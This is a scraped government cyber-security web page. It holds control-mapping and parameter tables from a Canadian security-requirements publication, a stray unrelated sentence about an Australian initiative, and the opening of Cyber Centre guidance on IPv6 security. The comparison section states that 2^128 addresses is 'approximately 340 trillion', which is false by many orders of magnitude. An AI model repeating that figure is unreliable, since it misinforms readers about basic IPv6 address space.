href="#03-14-08">Information management and retention 03.14.08</a></td> </tr><tr><td>SI-16</td> <td>Memory protection</td> <td>NCO</td> <td>none</td> </tr><tr><td>SI-400</td> <td>Dedicated administration workstation</td> <td>C</td> <td><a href="#03-14-09">Dedicated administration workstation 03.14.09</a></td> </tr></tbody></table></div> <!–** TOP OF PAGE ******–> <div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab20"><caption>Table 20: Supply chain risk management (SR)</caption> <thead><tr class="active"><th class="text-center" scope="col">Control / activity number</th> <th class="text-center" scope="col">ITSP.10.033-01 Medium impact baseline</th> <th class="text-center" scope="col">Tailoring criteria</th> <th class="text-center" scope="col">Security requirement</th> </tr></thead><tbody><tr><td>SR-01</td> <td>Supply chain risk management policy and procedures</td> <td>C</td> <td><a href="#03-15-01">Policy and procedures 03.15.01</a></td> </tr><tr><td>SR-02</td> <td>Supply chain risk management plan</td> <td>C</td> <td><a href="#03-17-01">Supply chain risk management plan 03.17.01</a></td> </tr><tr><td>SR-02(01)</td> <td>Supply chain risk management plan: Establish <abbr title="supply chain risk management">SCRM</abbr> team</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-03</td> <td>Supply chain controls and processes</td> <td>C</td> <td><a href="#03-17-03">Supply chain requirements and processes 03.17.03</a></td> </tr><tr><td>SR-05</td> <td>Acquisition strategies, tools, and methods</td> <td>C</td> <td><a href="#03-17-02">Acquisition strategies, tools, and methods 03.17.02</a></td> </tr><tr><td>SR-06</td> <td>Supplier assessments and reviews</td> <td>C</td> <td><a href="#03-11-01">Risk assessment 03.11.01</a></td> </tr><tr><td>SR-08</td> <td>Notification agreements</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-10</td> <td>Inspection of systems or components</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11</td> <td>Component authenticity</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11(01)</td> <td>Component authenticity: Anti-counterfeit training</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-11(02)</td> <td>Component authenticity: Configuration control for component service and repair</td> <td>NCO</td> <td>none</td> </tr><tr><td>SR-12</td> <td>Component disposal</td> <td>ORC</td> <td>none</td> </tr></tbody></table></div> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–> <section><h2 class="text-info" id="AB">Annex B Organization-defined parameters</h2> <p>This appendix lists the organization-defined parameters (ODPs) that are included in the security requirements in Section 3. The <abbr title="organization-defined parameter">ODP</abbr>s are listed sequentially by requirement family, beginning with the first requirement containing an <abbr title="organization-defined parameter">ODP</abbr> in the Access Control (AC) family and ending with the last requirement containing an <abbr title="organization-defined parameter">ODP</abbr> in the Supply Chain Risk Management (SR) family.</p> <div class="table-responsive col-md-12"> <table class="table table-bordered" id="tab21"><caption>Table 21: Organization-defined parameters</caption> <thead><tr class="active"><th class="text-center" scope="col">Security requirement</th> <th class="text-center" scope="col">Organization-defined parameter</th> </tr></thead><tbody><tr><td><a href="#03-01-01">Account management 03.01.01</a>.F.02</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.02</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.G.03</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.H</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-01">Account management 03.01.01</a>.H</td> <td>[Assignment: organization-defined circumstances]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.B</td> <td>[Assignment: organization-defined security functions]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.B</td> <td>[Assignment: organization-defined security-relevant information]</td> </tr><tr><td><a href="#03-01-05">Least privilege 03.01.05</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-01-06">Least privilege – privileged accounts 03.01.06</a>.A</td> <td>[Assignment: organization-defined personnel or roles]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.A</td> <td>[Assignment: organization-defined number]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.A</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-01-08">Unsuccessful logon attempts 03.01.08</a>.B</td> <td>[Selection (one or more): lock the account or node for an [Assignment: organization-defined time period]; lock the account or node until released by an administrator; delay next logon prompt; notify system administrator; take other action]</td> </tr><tr><td><a href="#03-01-10">Device lock 03.01.10</a>.A</td> <td>[Selection (one or more): initiating a device lock after [Assignment: organization-defined time period] of inactivity; requiring the user to initiate a device lock before leaving the system unattended]</td> </tr><tr><td><a href="#03-01-11">Session termination 03.01.11</a></td> <td>[Assignment: organization-defined conditions or trigger events requiring session disconnect]</td> </tr><tr><td><a href="#03-01-20">Use of external systems 03.01.20</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.A.01</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.A.02</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-01">Literacy training and awareness 03.02.01</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.A.01</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.A.02</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-02-02">Role-based training 03.02.02</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-03-01">Event logging 03.03.01</a>.A</td> <td>[Assignment: organization-defined event types]</td> </tr><tr><td><a href="#03-03-01">Event logging 03.03.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a>.A</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-03-04">Response to audit logging process failures 03.03.04</a>.B</td> <td>[Assignment: organization-defined additional actions]</td> </tr><tr><td><a href="#03-03-05">Audit record review, analysis, and reporting 03.03.05</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-03-07">Time stamps 03.03.07</a>.B</td> <td>[Assignment: organization-defined granularity of time measurement]</td> </tr><tr><td><a href="#03-04-01">Baseline configuration 03.04.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-02">Configuration settings 03.04.02</a>.A</td> <td>[Assignment: organization-defined configuration settings]</td> </tr><tr><td><a href="#03-04-06">Least functionality 03.04.06</a>.B</td> <td>[Assignment: organization-defined functions, ports, protocols, connections, and/or services]</td> </tr><tr><td><a href="#03-04-06">Least functionality 03.04.06</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-08">Authorized software – allow by exception 03.04.08</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-10">System component inventory 03.04.10</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a>.A</td> <td>[Assignment: organization-defined system configurations]</td> </tr><tr><td><a href="#03-04-12">System and component configuration for high-risk areas 03.04.12</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-05-01">User identification, authentication, and re-authentication 03.05.01</a>.B</td> <td>[Assignment: organization-defined circumstances or situations requiring re-authentication]</td> </tr><tr><td><a href="#03-05-02">Device identification and authentication 03.05.02</a></td> <td>[Assignment: organization-defined devices or types of devices]</td> </tr><tr><td><a href="#03-05-05">Identifier management 03.05.05</a>.C</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-05-05">Identifier management 03.05.05</a>.D</td> <td>[Assignment: organization-defined characteristic identifying individual status]</td> </tr><tr><td><a href="#03-05-07">Password management 03.05.07</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-05-07">Password management 03.05.07</a>.F</td> <td>[Assignment: organization-defined composition and complexity rules]</td> </tr><tr><td><a href="#03-05-12">Authenticator management 03.05.12</a>.E</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-05-12">Authenticator management 03.05.12</a>.E</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a>.B</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-06-02">Incident monitoring, reporting, and response assistance 03.06.02</a>.C</td> <td>[Assignment: organization-defined authorities]</td> </tr><tr><td><a href="#03-06-03">Incident response testing 03.06.03</a></td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.A.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.A.03</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-06-04">Incident response training 03.06.04</a>.B</td> <td>[Assignment: organization-defined events]</td> </tr><tr><td><a href="#03-08-07">Media use 03.08.07</a>.A</td> <td>[Assignment: organization-defined types of system media]</td> </tr><tr><td><a href="#03-09-01">Personnel screening 03.09.01</a>.B</td> <td>[Assignment: organization-defined conditions requiring rescreening]</td> </tr><tr><td><a href="#03-09-02">Personnel termination and transfer 03.09.02</a>.A.01</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-10-01">Physical access authorizations 03.10.01</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-10-02">Monitoring physical access 03.10.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-10-02">Monitoring physical access 03.10.02</a>.B</td> <td>[Assignment: organization-defined events or potential indications of events]</td> </tr><tr><td><a href="#03-10-06">Alternate work site 03.10.06</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-11-01">Risk assessment 03.11.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.A</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.B</td> <td>[Assignment: organization-defined response times]</td> </tr><tr><td><a href="#03-11-02">Vulnerability monitoring and scanning 03.11.02</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-12-01">Security assessment 03.12.01</a></td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-12-05">Information exchange 03.12.05</a>.A</td> <td>[Selection (one or more): interconnection security agreements; information exchange security agreements; memoranda of understanding or agreement; service-level agreements; user agreements; nondisclosure agreements; other types of agreements]</td> </tr><tr><td><a href="#03-12-05">Information exchange 03.12.05</a>.C</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-13-09">Network disconnect 03.13.09</a></td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-13-10">Cryptographic key establishment and management 03.13.10</a></td> <td>[Assignment: organization-defined requirements for key establishment and management]</td> </tr><tr><td><a href="#03-13-11">Cryptographic protection 03.13.11</a></td> <td>[Assignment: organization-defined types of cryptography]</td> </tr><tr><td><a href="#03-13-12">Collaborative computing devices and applications 03.13.12</a>.A</td> <td>[Assignment: organization-defined exceptions where remote activation is to be allowed]</td> </tr><tr><td><a href="#03-14-01">Flaw remediation 03.14.01</a>.B</td> <td>[Assignment: organization-defined time period]</td> </tr><tr><td><a href="#03-14-02">Malicious code protection 03.14.02</a>.C.01</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-15-01">Policy and procedures 03.15.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-15-02">System security plan 03.15.02</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-15-03">Rules of behaviour 03.15.03</a>.D</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-16-01">Security engineering principles 03.16.01</a></td> <td>[Assignment: organization-defined systems security engineering principles]</td> </tr><tr><td><a href="#03-16-03">External system services 03.16.03</a>.A</td> <td>[Assignment: organization-defined security requirements]</td> </tr><tr><td><a href="#03-17-01">Supply chain risk management plan 03.17.01</a>.B</td> <td>[Assignment: organization-defined frequency]</td> </tr><tr><td><a href="#03-17-03">Supply chain requirements and processes 03.17.03</a>.B</td> <td>[Assignment: organization-defined security requirements]</td> </tr></tbody></table></div> </section><!–** TOP OF PAGE ******–><div class="clearfix"> </div> <div class="pull-right small text-muted mrgn-bttm-0"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"></span></div> <!–** END TOP OF PAGE **–><!–FOOTNOTE SECTION EN–> <aside class="wb-fnote" role="note"><h2 id="reference">Notes</h2> <dl><dt>Footnote 1</dt> <dd id="fn1"> <p>System that is used or operated by a <abbr title="Government of Canada">GC</abbr> department or agency, by a contractor, or by another organization on behalf of a department or agency. The term system as used in this publication includes people, processes and technologies involved in the handling, processing, storage or transmission of specified information. Systems can include operational technology (OT), information technology (IT), Internet of Things (IoT) devices, industrial IoT (IIoT) devices, specialized systems, cyber-physical systems, embedded systems, and sensors.</p> <p class="fn-rtn"><a href="#fn1-rf"><span class="wb-inv">Return to footnote</span>1<span class="wb-inv"> referrer</span></a></p> </dd> <dt>Footnote 2</dt> <dd id="fn2"> <p>Components include workstations, servers, notebook computers, smartphones, tablets, input and output devices, network components, operating systems, virtual machines, database management systems, and applications.</p> <p class="fn-rtn"><a href="#fn2-rf"><span class="wb-inv">Return to footnote</span>2<span class="wb-inv"> referrer</span></a></p> </dd> </dl></aside></div> </div> </div> </div> </div> </div> </div> </article>

MDA is ASD’s ACSC initiative to ensure that organizations consider and actively apply secure design and architecture in their cyber security strategy, resilience planning and implementations. This series of guidance includes 3 publications.

<article data-history-node-id="6622" about="/en/guidance/security-considerations-internet-protocol-version-6-itsm80003" class="cccs-basic-page full clearfix"> <div class="content"> <div class="layout layout–onecol"> <div class="layout__region layout__region–content"> <div data-block-plugin-id="extra_field_block:node:cccs_basic_page:links" class="block block-layout-builder block-extra-field-blocknodecccs-basic-pagelinks clearfix"> </div> <div data-block-plugin-id="field_block:node:cccs_basic_page:body" class="block block-layout-builder block-field-blocknodecccs-basic-pagebody clearfix"> <div class="field field–name-body field–type-text-with-summary field–label-hidden field–item"><div class="row"><!–Info across the top under the image–> <div class="col-md-4 col-sm-12 pull-left hidden-xs hidden-sm"> <p class="text-left"><strong>October 2025</strong></p> </div> <div class="col-md-4 col-sm-12 hidden-xs hidden-sm"> <p class="text-center"><strong>Management series</strong></p> </div> <div class="col-md-4 col-sm-12 pull-right hidden-xs hidden-sm"> <p class="text-right"><strong>ITSM.80.003</strong></p> </div> <!–MOBILE STARTS HERE–> <div class="hidden-lg hidden-md text-center"> <p><strong>October 2025 | Management series</strong></p> </div> <!–pdf download–> <div class="col-md-12 mrgn-tp-lg"> <div class="mrgn-bttm-md well well-sm col-md-4 col-sm-12 col-xs-12 pull-right mrgn-lft-md"> <p class="mrgn-tp-sm"><strong>Alternate format</strong>: <a href="/sites/default/files/security-considerations-for-Internet-Protocol-version-6-ITSM.80.003.pdf">Security considerations for Internet Protocol version 6 – ITSM.80.003 (PDF, 552 Kb)</a></p> </div> <section><h2 class="text-info mrgn-tp-0">Foreword</h2> <p>This is an <span class="text-uppercase">unclassfied</span>, publication, issued under the authority of the Head of the Canadian Centre for Cyber Security (Cyber Centre). For more information, contact the Cyber Centre:</p> <p><span class="glyphicon glyphicon-envelope"></span><span class="wb-inv">email</span> <a href="mailto:contact@cyber.gc.ca">contact@cyber.gc.ca</a> |<span class="glyphicon glyphicon-phone"></span><span class="wb-inv">Mobile</span> <a href="tel:613-949-7048">613-949-7048</a> or <a href="tel:+1-833-292-3788">1<span>‑</span>833<span>‑</span>CYBER<span>‑</span>88</a></p> </section></div> </div> <section><h2 class="text-info">Effective date</h2> <p>This publication takes effect on October 10, 2025.</p> </section><section><h2 class="text-info">Revision history</h2> <ol><li><strong>First release:</strong> October 10, 2025.</li> </ol></section><section><details class="mrgn-tp-md"><summary><h2 class="h3">Table of Contents</h2> </summary><ul class="list-unstyled mrgn-tp-lg"><li><a href="#1">1 Introduction</a> <ul><li><a href="#1.1">1.1 Internet Protocol version 6</a></li> <li><a href="#1.2">1.2 Internet Protocol version 6 enhancements</a> <ul><li><a href="#1.2.1">1.2.1 IP security support</a></li> <li><a href="#1.2.2">1.2.2 Autoconfiguration</a></li> <li><a href="#1.2.3">1.2.3 Neighbor discovery</a></li> <li><a href="#1.2.4">1.2.4 Dynamic host configuration protocol security</a></li> <li><a href="#1.2.5">1.2.5 Extension headers</a></li> <li><a href="#1.2.6">1.2.6 No broadcast addresses</a></li> </ul></li> <li><a href="#1.3">1.3 Problem statement</a></li> <li><a href="#1.4">1.4 Threat context</a> <ul><li><a href="#1.4.1">1.4.1 Protocol tunneling</a></li> <li><a href="#1.4.2">1.4.2 Distributed denial-of-service attacks</a></li> <li><a href="#1.4.3">1.4.3 Command and control</a></li> <li><a href="#1.4.4">1.4.4 Network device misconfigurations</a></li> <li><a href="#1.4.5">1.4.5 Network service discovery</a></li> </ul></li> </ul></li> <li><a href="#2">2 Security considerations</a> <ul><li><a href="#2.1">2.1 Migration risks</a></li> <li><a href="#2.2">2.2 Procurement and testing</a></li> <li><a href="#2.3">2.3 Target architecture</a></li> <li><a href="#2.4">2.4 Legacy applications</a></li> <li><a href="#2.5">2.5 Unauthorized tunnels</a></li> <li><a href="#2.6">2.6 Default configurations</a></li> <li><a href="#2.7">2.7 Unauthorized IPv6 traffic flows</a></li> <li><a href="#2.8">2.8 Monitoring and management tools</a></li> <li><a href="#2.9">2.9 Addressing scheme</a></li> <li><a href="#2.10">2.10 Multi-addressing support</a></li> <li><a href="#2.11">2.11 Dynamic Host Configuration Protocol for IPv6</a></li> <li><a href="#2.12">2.12 Address autoconfiguration protections</a></li> <li><a href="#2.13">2.13 Dual-stack environments</a></li> <li><a href="#2.14">2.14 Protection of data and management planes</a></li> <li><a href="#2.15">2.15 Neighbor discovery messages</a></li> <li><a href="#2.16">2.16 Address translation risks</a></li> <li><a href="#2.17">2.17 Zero trust architecture</a></li> <li><a href="#2.18">2.18 Technical and operational depth</a></li> </ul></li> <li><a href="#3">3 Conclusion</a></li> <li><a href="#reference">Reference</a></li> </ul></details></section><section><h2 class="mrgn-tp-xl text-info">Overview</h2> <p>Exponential growth in the use of Internet-based technologies to deliver modern business services and applications is linked to the depletion of globally available Internet Protocol version 4 (IPv4) addresses. The Internet Protocol version 6 (IPv6) addressing scheme was designed by the Internet Engineering Task Force (IETF) to replace <abbr title="Internet Protocol version 4">IPv4</abbr>, and it offers significantly larger private and public address blocks to adequately support modern enterprise and non-enterprise needs. Deploying <abbr title="Internet Protocol version 6">IPv6</abbr> endpoints alongside existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure is emerging as a common strategy within enterprise networks. While <abbr title="Internet Protocol version 6">IPv6</abbr> offers several security enhancements that <abbr title="Internet Protocol version 4">IPv4</abbr> does not, running dual-stack architectures introduces new risks that must be appropriately managed.</p> <p>To ensure its service architecture continues to evolve, the Government of Canada (GC) will need to design new network architectures and migrate existing digital infrastructure to support <abbr title="Internet Protocol version 6">IPv6</abbr>. As part of this strategy, <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled services must be designed to securely co-exist alongside existing <abbr title="Internet Protocol version 4">IPv4</abbr> infrastructure until an <abbr title="Internet Protocol version 6">IPv6</abbr>-only enterprise architecture emerges. While introducing <abbr title="Internet Protocol version 6">IPv6</abbr> within GC infrastructure may have little or no direct impact on users and front-end services, GC departments must examine and assess the implications of <abbr title="Internet Protocol version 6">IPv6</abbr> on their business services and security objectives.</p> <p>This publication highlights critical security considerations for <abbr title="Internet Protocol version 6">IPv6</abbr> deployments within GC networks. GC departments must design transition plans to support <abbr title="Internet Protocol version 6">IPv6</abbr> addressing while ensuring operational and security risks are mitigated.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h2 class="mrgn-tp-xl text-info" id="1">1 Introduction</h2> <p>The GC relies on digital, inter-networked systems for delivering essential services to Canadians. Networking technologies continuously evolve due to the requirements of the digital infrastructure needed to support modern service connectivity. While the average Canadian user may not understand which Internet Protocol (IP) stack supports their services, the expectation is that GC digital service infrastructure should be able to process service requests from <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled or <abbr title="Internet Protocol version 4">IPv4</abbr>-enabled devices. As GC networks and services are built to support the <abbr title="Internet Protocol version 6">IPv6</abbr> technology stack, key stakeholders must assess the potential risks and impact of adopting the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol within the enterprise network, particularly security risks associated with implementing a dual-stack (<abbr title="Internet Protocol version 4">IPv4</abbr> and <abbr title="Internet Protocol version 6">IPv6</abbr>) architecture.</p> <p>Modern systems and applications have varying <abbr title="Internet Protocol version 6">IPv6</abbr> protocol support; sometimes the protocol is available by default while other times, vendor-unique customizations are implemented, which can lead to interoperability challenges. These can expose enterprise networks to considerable security risks, increasing the likelihood for misconfigurations and gaps in security controls.</p> <p>In 2013, <abbr title="Treasury Board of Canada Secretariat">TBS</abbr> released the <a href="https://www.tbs-sct.canada.ca/pol/doc-eng.aspx?id=26295"><abbr title="Internet Protocol version 6">IPv6</abbr> Network Equipment Procurement Guideline</a> as a follow-up to the <abbr title="Internet Protocol version 6">IPv6</abbr> Adoption Strategy. This guideline was meant to help GC departments understand the technical requirements when procuring network equipment (for example, routers, network monitoring devices, proxy servers, firewalls) to ensure <abbr title="Internet Protocol version 6">IPv6</abbr> capabilities are evaluated as part of system procurement processes. However, neither the strategy nor the procurement guidelines adequately address security considerations for <abbr title="Internet Protocol version 6">IPv6</abbr>.</p> <p>While sections of the existing departmental digital architecture may be capable of supporting <abbr title="Internet Protocol version 6">IPv6</abbr>, without a secured framework for implementation, security risks may be inadvertently introduced into the enterprise environment. Departments should not assume that enabling support for <abbr title="Internet Protocol version 6">IPv6</abbr> can simply occur by flipping a switch.</p> <p>According to the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol specification, <abbr title="Internet Protocol version 6">IPv6</abbr> is prioritized over <abbr title="Internet Protocol version 4">IPv4</abbr> by default. Although business enterprise applications may not use the <abbr title="Internet Protocol version 6">IPv6</abbr> protocol, defined specification standards and vendor-implemented default configurations may allow communications with <abbr title="Internet Protocol version 6">IPv6</abbr> link-local addresses. For example, Microsoft<sup id="fn1-rf"><a class="fn-lnk" href="#fn1"><span class="wb-inv">Footnote </span>1</a></sup> does not recommend disabling <abbr title="Internet Protocol version 6">IPv6</abbr> support on Windows operating environments even when not in use. To assess these and other issues, the Cyber Centre recommends that GC departments conduct a review of <abbr title="Internet Protocol version 6">IPv6</abbr> network flows within their environment and address gaps that may exist within their network security monitoring tools before implementation. Enabling <abbr title="Internet Protocol version 6">IPv6</abbr> traffic flows without adequate network visibility monitoring or appropriate network filtering protections may increase the enterprise attack surface and expose the network to additional security risks.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.1">1.1 Internet Protocol version 6</h3> <p><abbr title="Internet Protocol">IP</abbr> is the primary communications protocol of the Internet; it specifies how network packets are to be transported across network boundaries. <abbr title="Internet Protocol">IP</abbr> is a component of the network layer in the Open Systems Interconnection reference model, a framework for organizing communication protocols and sharing information over the public Internet.</p> <p><abbr title="Internet Protocol version 6">IPv6</abbr> was designed to replace <abbr title="Internet Protocol version 4">IPv4</abbr>, with some enhancements in operational and security functions. Differences exist between <abbr title="Internet Protocol version 6">IPv6</abbr> and <abbr title="Internet Protocol version 4">IPv4</abbr> which have implications on network architecture designs. The <abbr title="Internet Protocol version 6">IPv6</abbr> protocol standard is a 128-bit network addressing scheme, which provides a significantly wider address space compared to <abbr title="Internet Protocol version 4">IPv4</abbr> (which uses a 32-bit network addressing scheme). By default, <abbr title="Internet Protocol version 6">IPv6</abbr> is not backward compatible with <abbr title="Internet Protocol version 4">IPv4</abbr>, which may require network administrators to implement changes to existing network architectures.</p> <h3 class="mrgn-tp-md">Internet Protocol version 6 compared to Internet Protocol version 4</h3> <h3>Protocol components – Address space and notation</h3> <h4>Internet Protocol version 4</h4> <ul><li>uses 32-bit address space, and therefore offers a limited address space for private and public use cases</li> <li>address notation consists of numbers separated by a period, for example, 192.168.0.1</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>uses 128-bit address space, and therefore allows up to 2^128 unique network addresses (approximately 340 trillion)</li> <li>address notation consists of eight colon-separated hexadecimal values, for example, 2001:0DB8:0000:0000:0000:000A:09C0:00B4</li> </ul><h3>Protocol components – Security functions</h3> <h4>Internet Protocol version 4</h4> <ul><li>Protocol does not natively support authentication and security functions</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>Natively supports authentication, data integrity, and data confidentiality (for example, IP security (IPsec) support)</li> </ul><h3>Protocol components – Types</h3> <h4>Internet Protocol version 4</h4> <ul><li>Supports public and private static addressing to manage networks; however, address space is limited</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>supports public routing and private static addressing to manage network devices</li> <li>typical network address is composed of sections and identifiers (global routing prefix, local subnet identifier and interface identifier)</li> </ul><h3>Protocol components – Address distribution</h3> <h4>Internet Protocol version 4</h4> <ul><li>Autoconfiguration is not supported and would require static or Dynamic Host Configuration Protocol (DHCP) assignment of IP addresses</li> </ul><h4>Internet Protocol version 6</h4> <ul><li>Allows autoconfiguration (stateless address configurations), easing the need for address assignment by a DHCP server. Autoconfiguration relies on router information for network addresses to access network services</li> </ul><div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.2">1.2 Internet Protocol version 6 enhancements</h3> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> specification standard proposed enhancements which were not previously available in <abbr title="Internet Protocol version 4">IPv4</abbr>. The following subsections provide additional information on the security enhancements.</p> <h4 id="1.2.1">1.2.1 Internet Protocol security support</h4> <p>IPsec is a suite of protocols that can be used for authentication, encryption, and integrity protections. While IPsec can be used as a retroactive extension in <abbr title="Internet Protocol version 4">IPv4</abbr>, for <abbr title="Internet Protocol version 6">IPv6</abbr> it is supported as part of the standard. Note, IPsec is no longer mandatory in <abbr title="Internet Protocol version 6">IPv6</abbr> as per <abbr title="request for comments">RFC</abbr> 8504<sup id="fn2-rf"><a class="fn-lnk" href="#fn2"><span class="wb-inv">Footnote </span>2</a></sup>.</p> <h4 id="1.2.2">1.2.2 Autoconfiguration</h4> <p>Autoconfiguration provides the ability for a node to self-assign its <abbr title="Internet Protocol version 6">IPv6</abbr> network address based on the network prefix information advertised by the router. Stateless address autoconfiguration (SLAAC) is the mechanism by which this can be achieved.</p> <h4 id="1.2.3">1.2.3 Neighbor discovery</h4> <p>The neighbor discovery (ND) protocol replaces the address resolution protocol used in <abbr title="Internet Protocol version 4">IPv4</abbr> networks, providing cryptographic options to secure discovery messages.</p> <h4 id="1.2.4">1.2.4 Dynamic host configuration protocol security</h4> <p>The dynamic host configuration protocol for <abbr title="Internet Protocol version 6">IPv6</abbr> (DHCPv6) supports authentication (and encryption) of <abbr title="Dynamic Host Configuration Protocol">DHCP</abbr> messages using IPsec, thus preventing eavesdropping and message intercept attacks.</p> <h4 id="1.2.5">1.2.5 Extension headers</h4> <p><abbr title="Internet Protocol version 6">IPv6</abbr> extension headers can be used to improve security, debugging, and management functions.</p> <h4 id="1.2.6">1.2.6 No broadcast addresses</h4> <p>The <abbr title="Internet Protocol version 6">IPv6</abbr> standard abolished the use of broadcast addresses and adopted multicast addresses as the primary mechanism for group communications.</p> <div class="pull-right small text-muted"><a href="#wb-tphp">Top of page</a> <span aria-hidden="true" class="text-primary glyphicon glyphicon-circle-arrow-up"> </span></div> </section><section><h3 class="mrgn-tp-xl" id="1.3">1.3 Problem statement</h3> <p>As enterprise networks evolve, <abbr title="Internet Protocol version 6">IPv6</abbr> will inevitably need to be supported and managed. New network devices will likely support <abbr title="Internet Protocol version 6">IPv6</abbr> and have it enabled by default, prioritizing its traffic flow in line with the specification standard. Deploying <abbr title="Internet Protocol version 6">IPv6</abbr>-enabled devices without proper understanding, adequate monitoring, hardening, and deployment of appropriate mitigation controls will increase the enterprise attack surface and expose the organization to significant risks.</p> <div class="pull-right small 